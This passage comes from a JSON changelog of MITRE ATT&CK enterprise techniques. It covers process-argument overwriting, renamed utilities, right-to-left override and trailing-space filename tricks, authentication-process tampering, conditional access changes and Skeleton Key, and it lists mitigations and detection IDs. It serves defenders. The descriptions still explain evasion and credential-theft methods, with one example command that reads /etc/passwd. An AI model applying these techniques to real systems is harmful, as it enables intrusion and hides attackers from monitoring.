                            "M1022: Restrict File and Directory Permissions",
                            "M1038: Execution Prevention",
                            "M1045: Code Signing"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0347: Detection Strategy for Masquerading via Legitimate Resource Name or Location"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--514dc7b3-0b80-4382-80a9-2e2d294f5019",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-03-27 20:37:52.269000+00:00",
                    "modified": "2026-04-15 20:40:03.475000+00:00",
                    "name": "Overwrite Process Arguments",
                    "description": "Adversaries may modify a process's in-memory arguments to change its name in order to appear as a legitimate or benign process. On Linux, the operating system stores command-line arguments in the process\u2019s stack and passes them to the `main()` function as the `argv` array. The first element, `argv[0]`, typically contains the process name or path - by default, the command used to actually start the process (e.g., `cat /etc/passwd`). By default, the Linux `/proc` filesystem uses this value to represent the process name. The `/proc/<PID>/cmdline` file reflects the contents of this memory, and tools like `ps` use it to display process information. Since arguments are stored in user-space memory at launch, this modification can be performed without elevated privileges. \n\nDuring runtime, adversaries can erase the memory used by all command-line arguments for a process, overwriting each argument string with null bytes. This removes evidence of how the process was originally launched. They can then write a spoofed string into the memory region previously occupied by `argv[0]` to mimic a benign command, such as `cat resolv.conf`. The new command-line string is reflected in `/proc/<PID>/cmdline` and displayed by tools like `ps`.(Citation: Sandfly BPFDoor 2022)(Citation: Microsoft XorDdos Linux Stealth 2022) ",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1036/011",
                            "external_id": "T1036.011"
                        },
                        {
                            "source_name": "Microsoft XorDdos Linux Stealth 2022",
                            "description": "Ratnesh Pandey, Yevgeny Kulakov, and Jonathan Bar Or with Saurabh Swaroop. (2022, May 19). Rise in XorDdos: A deeper look at the stealthy DDoS malware targeting Linux devices. Retrieved September 27, 2023.",
                            "url": "https://www.microsoft.com/en-us/security/blog/2022/05/19/rise-in-xorddos-a-deeper-look-at-the-stealthy-ddos-malware-targeting-linux-devices/"
                        },
                        {
                            "source_name": "Sandfly BPFDoor 2022",
                            "description": "The Sandfly Security Team. (2022, May 11). BPFDoor - An Evasive Linux Backdoor Technical Analysis. Retrieved September 29, 2023.",
                            "url": "https://sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 20:40:03.475000+00:00\", \"old_value\": \"2025-04-15 19:58:30.391000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0164: Detection Strategy for Overwritten Process Arguments Masquerading"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-02-10 20:03:11.691000+00:00",
                    "modified": "2026-04-15 20:40:54.471000+00:00",
                    "name": "Rename Legitimate Utilities",
                    "description": "Adversaries may rename legitimate / system utilities to try to evade security mechanisms concerning the usage of those utilities. Security monitoring and control mechanisms may be in place for legitimate utilities adversaries are capable of abusing, including both built-in binaries and tools such as PSExec, AutoHotKey, and IronPython.(Citation: LOLBAS Main Site)(Citation: Huntress Python Malware 2025)(Citation: The DFIR Report AutoHotKey 2023)(Citation: Splunk Detect Renamed PSExec) It may be possible to bypass those security mechanisms by renaming the utility prior to utilization (ex: rename <code>rundll32.exe</code>).(Citation: Elastic Masquerade Ball) An alternative case occurs when a legitimate utility is copied or moved to a different directory and renamed to avoid detections based on these utilities executing from non-standard paths.(Citation: F-Secure CozyDuke)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1036/003",
                            "external_id": "T1036.003"
                        },
                        {
                            "source_name": "Elastic Masquerade Ball",
                            "description": "Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball. Retrieved October 31, 2016.",
                            "url": "https://www.elastic.co/blog/how-hunt-masquerade-ball"
                        },
                        {
                            "source_name": "F-Secure CozyDuke",
                            "description": "F-Secure Labs. (2015, April 22). CozyDuke: Malware Analysis. Retrieved December 10, 2015.",
                            "url": "https://www.f-secure.com/documents/996508/1030745/CozyDuke"
                        },
                        {
                            "source_name": "LOLBAS Main Site",
                            "description": "LOLBAS. (n.d.). Living Off The Land Binaries and Scripts (and also Libraries). Retrieved February 10, 2020.",
                            "url": "https://lolbas-project.github.io/"
                        },
                        {
                            "source_name": "Huntress Python Malware 2025",
                            "description": "Matthew Brennan. (2024, July 5). Snakes on a Domain: An Analysis of a Python Malware Loader. Retrieved April 3, 2025.",
                            "url": "https://www.huntress.com/blog/snakes-on-a-domain-an-analysis-of-a-python-malware-loader"
                        },
                        {
                            "source_name": "Splunk Detect Renamed PSExec",
                            "description": "Splunk. (2025, February 24). Detection: Detect Renamed PSExec. Retrieved April 3, 2025.",
                            "url": "https://research.splunk.com/endpoint/683e6196-b8e8-11eb-9a79-acde48001122/"
                        },
                        {
                            "source_name": "The DFIR Report AutoHotKey 2023",
                            "description": "The DFIR Report. (2023, February 6). Collect, Exfiltrate, Sleep, Repeat. Retrieved April 3, 2025.",
                            "url": "https://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Matt Anderson, @\u200cnosecurething, Huntress"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS",
                        "Windows"
                    ],
                    "x_mitre_version": "3.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 20:40:54.471000+00:00\", \"old_value\": \"2025-10-24 17:49:18.517000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"3.0\", \"old_value\": \"2.0\"}}, \"iterable_item_removed\": {\"root['external_references'][1]\": {\"source_name\": \"Twitter ItsReallyNick Masquerading Update\", \"description\": \"Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading. Retrieved September 12, 2024.\", \"url\": \"https://x.com/ItsReallyNick/status/1055321652777619457\"}}}",
                    "previous_version": "2.0",
                    "version_change": "2.0 \u2192 3.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1022: Restrict File and Directory Permissions"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0005: Renamed Legitimate Utility Execution with Metadata Mismatch and Suspicious Path"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--77eae145-55db-4519-8ae5-77b0c7215d69",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-02-10 19:55:29.385000+00:00",
                    "modified": "2026-04-15 20:41:03.753000+00:00",
                    "name": "Right-to-Left Override",
                    "description": "Adversaries may abuse the right-to-left override (RTLO or RLO) character (U+202E) to disguise a string and/or file name to make it appear benign. RTLO is a non-printing Unicode character that causes the text that follows it to be displayed in reverse. For example, a Windows screensaver executable named <code>March 25 \\u202Excod.scr</code> will display as <code>March 25 rcs.docx</code>. A JavaScript file named <code>photo_high_re\\u202Egnp.js</code> will be displayed as <code>photo_high_resj.png</code>.(Citation: Infosecinstitute RTLO Technique)\n\nAdversaries may abuse the RTLO character as a means of tricking a user into executing what they think is a benign file type. A common use of this technique is with [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)/[Malicious File](https://attack.mitre.org/techniques/T1204/002) since it can trick both end users and defenders if they are not aware of how their tools display and render the RTLO character. Use of the RTLO character has been seen in many targeted intrusion attempts and criminal activity.(Citation: Trend Micro PLEAD RTLO)(Citation: Kaspersky RTLO Cyber Crime) RTLO can be used in the Windows Registry as well, where regedit.exe displays the reversed characters but the command line tool reg.exe does not by default.",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1036/002",
                            "external_id": "T1036.002"
                        },
                        {
                            "source_name": "Trend Micro PLEAD RTLO",
                            "description": "Alintanahin, K.. (2014, May 23). PLEAD Targeted Attacks Against Taiwanese Government Agencies. Retrieved April 22, 2019.",
                            "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/plead-targeted-attacks-against-taiwanese-government-agencies-2/"
                        },
                        {
                            "source_name": "Kaspersky RTLO Cyber Crime",
                            "description": "Firsh, A.. (2018, February 13). Zero-day vulnerability in Telegram - Cybercriminals exploited Telegram flaw to launch multipurpose attacks. Retrieved April 22, 2019.",
                            "url": "https://securelist.com/zero-day-vulnerability-in-telegram/83800/"
                        },
                        {
                            "source_name": "Infosecinstitute RTLO Technique",
                            "description": "Security Ninja. (2015, April 16). Spoof Using Right to Left Override (RTLO) Technique. Retrieved April 22, 2019.",
                            "url": "https://web.archive.org/web/20151102094333/https://resources.infosecinstitute.com/spoof-using-right-to-left-override-rtlo-technique-2/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS",
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 20:41:03.753000+00:00\", \"old_value\": \"2025-10-24 17:48:58.683000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['external_references'][3]['url']\": {\"new_value\": \"https://web.archive.org/web/20151102094333/https://resources.infosecinstitute.com/spoof-using-right-to-left-override-rtlo-technique-2/\", \"old_value\": \"https://resources.infosecinstitute.com/spoof-using-right-to-left-override-rtlo-technique-2/\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.1\"}}}",
                    "previous_version": "1.1",
                    "version_change": "1.1 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0527: Right-to-Left Override Masquerading Detection via Filename and Execution Context"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--e51137a5-1cdc-499e-911a-abaedaa5ac86",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-02-10 20:47:10.082000+00:00",
                    "modified": "2026-04-15 20:41:09.462000+00:00",
                    "name": "Space after Filename",
                    "description": "Adversaries can hide a program's true filetype by changing the extension of a file. With certain file types (specifically this does not work with .app extensions), appending a space to the end of a filename will change how the file is processed by the operating system.\n\nFor example, if there is a Mach-O executable file called <code>evil.bin</code>, when it is double clicked by a user, it will launch Terminal.app and execute. If this file is renamed to <code>evil.txt</code>, then when double clicked by a user, it will launch with the default text editing application (not executing the binary). However, if the file is renamed to <code>evil.txt </code> (note the space at the end), then when double clicked by a user, the true file type is determined by the OS and handled appropriately and the binary will be executed (Citation: Mac Backdoors are back).\n\nAdversaries can use this feature to trick users into double clicking benign-looking files of any format and ultimately executing something malicious.",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1036/006",
                            "external_id": "T1036.006"
                        },
                        {
                            "source_name": "Mac Backdoors are back",
                            "description": "Dan Goodin. (2016, July 6). After hiatus, in-the-wild Mac backdoors are suddenly back. Retrieved July 8, 2017.",
                            "url": "https://arstechnica.com/security/2016/07/after-hiatus-in-the-wild-mac-backdoors-are-suddenly-back/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Erye Hernandez, Palo Alto Networks"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 20:41:09.462000+00:00\", \"old_value\": \"2025-10-24 17:49:32.287000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.1\"}}}",
                    "previous_version": "1.1",
                    "version_change": "1.1 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0292: Masquerading via Space After Filename - Behavioral Detection Strategy"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--f4c1826f-a322-41cd-9557-562100848c84",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-02-11 19:01:56.887000+00:00",
                    "modified": "2026-04-16 20:07:52.977000+00:00",
                    "name": "Modify Authentication Process",
                    "description": "Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).\n\nAdversaries may maliciously modify a part of this process to either reveal credentials or bypass authentication mechanisms. Compromised credentials or access may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop.",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "defense-impairment"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "persistence"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "credential-access"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1556",
                            "external_id": "T1556"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Chris Ross @xorrior"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "IaaS",
                        "Identity Provider",
                        "Linux",
                        "macOS",
                        "Network Devices",
                        "Office Suite",
                        "SaaS",
                        "Windows"
                    ],
                    "x_mitre_version": "3.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-16 20:07:52.977000+00:00\", \"old_value\": \"2025-10-24 17:49:36.944000+00:00\"}, \"root['kill_chain_phases'][1]['phase_name']\": {\"new_value\": \"defense-impairment\", \"old_value\": \"defense-evasion\", \"new_path\": \"root['kill_chain_phases'][0]['phase_name']\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"3.0\", \"old_value\": \"2.6\"}}, \"iterable_item_removed\": {\"root['external_references'][1]\": {\"source_name\": \"Clymb3r Function Hook Passwords Sept 2013\", \"description\": \"Bialek, J. (2013, September 15). Intercepting Password Changes With Function Hooking. Retrieved November 21, 2017.\", \"url\": \"https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/\"}, \"root['external_references'][2]\": {\"source_name\": \"Xorrior Authorization Plugins\", \"description\": \"Chris Ross. (2018, October 17). Persistent Credential Theft with Authorization Plugins. Retrieved April 22, 2021.\", \"url\": \"https://xorrior.com/persistent-credential-theft/\"}, \"root['external_references'][3]\": {\"source_name\": \"Dell Skeleton\", \"description\": \"Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis. Retrieved April 8, 2019.\", \"url\": \"https://www.secureworks.com/research/skeleton-key-malware-analysis\"}, \"root['external_references'][4]\": {\"source_name\": \"dump_pwd_dcsync\", \"description\": \"Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.\", \"url\": \"https://adsecurity.org/?p=2053\"}, \"root['external_references'][5]\": {\"source_name\": \"TechNet Audit Policy\", \"description\": \"Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved June 3, 2016.\", \"url\": \"https://technet.microsoft.com/en-us/library/dn487457.aspx\"}}}",
                    "previous_version": "2.6",
                    "version_change": "2.6 \u2192 3.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1018: User Account Management",
                            "M1022: Restrict File and Directory Permissions",
                            "M1024: Restrict Registry Permissions",
                            "M1025: Privileged Process Integrity",
                            "M1026: Privileged Account Management",
                            "M1027: Password Policies",
                            "M1028: Operating System Configuration",
                            "M1032: Multi-factor Authentication",
                            "M1047: Audit"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0104: Detect Modification of Authentication Processes Across Platforms"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--ceaeb6d8-95ee-4da2-9d42-dc6aa6ca43ae",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2024-01-02 13:43:37.389000+00:00",
                    "modified": "2026-04-16 20:07:53.111000+00:00",
                    "name": "Conditional Access Policies",
                    "description": "Adversaries may disable or modify conditional access policies to enable persistent access to compromised accounts. Conditional access policies are additional verifications used by identity providers and identity and access management systems to determine whether a user should be granted access to a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be denied access to applications based on their IP address, device enrollment status, and use of multi-factor authentication.(Citation: Microsoft Conditional Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional Access Policies) In some cases, identity providers may also support the use of risk-based metrics to deny sign-ins based on a variety of indicators. In AWS and GCP, IAM policies can contain `condition` attributes that verify arbitrary constraints such as the source IP, the date the request was made, and the nature of the resources or regions being requested.(Citation: AWS IAM Conditions)(Citation: GCP IAM Conditions) These measures help to prevent compromised credentials from resulting in unauthorized access to data or resources, as well as limit user permissions to only those required. \n\nBy modifying conditional access policies, such as adding additional trusted IP ranges, removing [Multi-Factor Authentication](https://attack.mitre.org/techniques/T1556/006) requirements, or allowing additional [Unused/Unsupported Cloud Regions](https://attack.mitre.org/techniques/T1535), adversaries may be able to ensure persistent access to accounts and circumvent defensive measures.",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "defense-impairment"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "persistence"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "credential-access"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1556/009",
                            "external_id": "T1556.009"
                        },
                        {
                            "source_name": "AWS IAM Conditions",
                            "description": "AWS. (n.d.). IAM JSON policy elements: Condition. Retrieved January 2, 2024.",
                            "url": "https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_elements_condition.html"
                        },
                        {
                            "source_name": "GCP IAM Conditions",
                            "description": "Google Cloud. (n.d.). Overview of IAM Conditions. Retrieved January 2, 2024.",
                            "url": "https://cloud.google.com/iam/docs/conditions-overview"
                        },
                        {
                            "source_name": "JumpCloud Conditional Access Policies",
                            "description": "JumpCloud. (n.d.). Get Started: Conditional Access Policies. Retrieved January 2, 2024.",
                            "url": "https://jumpcloud.com/support/get-started-conditional-access-policies"
                        },
                        {
                            "source_name": "Microsoft Conditional Access",
                            "description": "Microsoft. (2023, November 15). What is Conditional Access?. Retrieved January 2, 2024.",
                            "url": "https://learn.microsoft.com/en-us/entra/identity/conditional-access/overview"
                        },
                        {
                            "source_name": "Okta Conditional Access Policies",
                            "description": "Okta. (2023, November 30). Conditional Access Based on Device Security Posture. Retrieved January 2, 2024.",
                            "url": "https://support.okta.com/help/s/article/Conditional-access-based-on-device-security-posture?language=en_US"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Gavin Knapp",
                        "Joshua Penny"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "IaaS",
                        "Identity Provider"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-16 20:07:53.111000+00:00\", \"old_value\": \"2025-04-15 22:09:03.621000+00:00\"}, \"root['kill_chain_phases'][1]['phase_name']\": {\"new_value\": \"defense-impairment\", \"old_value\": \"defense-evasion\", \"new_path\": \"root['kill_chain_phases'][0]['phase_name']\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.1\"}}}",
                    "previous_version": "1.1",
                    "version_change": "1.1 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1018: User Account Management"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0030: Detect Conditional Access Policy Modification in Identity and Cloud Platforms"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-02-11 19:05:02.399000+00:00",
                    "modified": "2026-04-16 20:07:53.091000+00:00",
                    "name": "Domain Controller Authentication",
                    "description": "Adversaries may patch the authentication process on a domain controller to bypass the typical authentication mechanisms and enable access to accounts. \n\nMalware may be used to inject false credentials into the authentication process on a domain controller with the intent of creating a backdoor used to access any user\u2019s account and/or credentials (ex: [Skeleton Key](https://attack.mitre.org/software/S0007)). Skeleton key works through a patch on an enterprise domain controller authentication process (LSASS) with credentials that adversaries may use to bypass the standard authentication system. Once patched, an adversary can use the injected password to successfully authenticate as any domain user account (until the the skeleton key is erased from memory by a reboot of the domain controller). Authenticated access may enable unfettered access to hosts and/or resources within single-factor authentication environments.(Citation: Dell Skeleton)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "defense-impairment"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "persistence"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "credential-access"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1556/001",
                            "external_id": "T1556.001"
                        },
                        {
                            "source_name": "Dell Skeleton",
                            "description": "Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis. Retrieved April 8, 2019.",
                            "url": "https://www.secureworks.com/research/skeleton-key-malware-analysis"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "3.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-16 20:07:53.091000+00:00\", \"old_value\": \"2025-10-24 17:49:27.324000+00:00\"}, \"root['kill_chain_phases'][1]['phase_name']\": {\"new_value\": \"defense-impairment\", \"old_value\": \"defense-evasion\", \"new_path\": \"root['kill_chain_phases'][0]['phase_name']\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"3.0\", \"old_value\": \"2.1\"}}, \"iterable_item_removed\": {\"root['external_references'][2]\": {\"source_name\": \"TechNet Audit Policy\", \"description\": \"Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved June 3, 2016.\", \"url\": \"https://technet.microsoft.com/en-us/library/dn487457.aspx\"}}}",
                    "previous_version": "2.1",
                    "version_change": "2.1 \u2192 3.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1017: User Training",
                            "M1025: Privileged Process Integrity",
                            "M1026: Privileged Account Management",
                            "M1032: Multi-factor Authentication"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0271: Detect Domain Controller Authentication Process Modification (Skeleton Key)"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
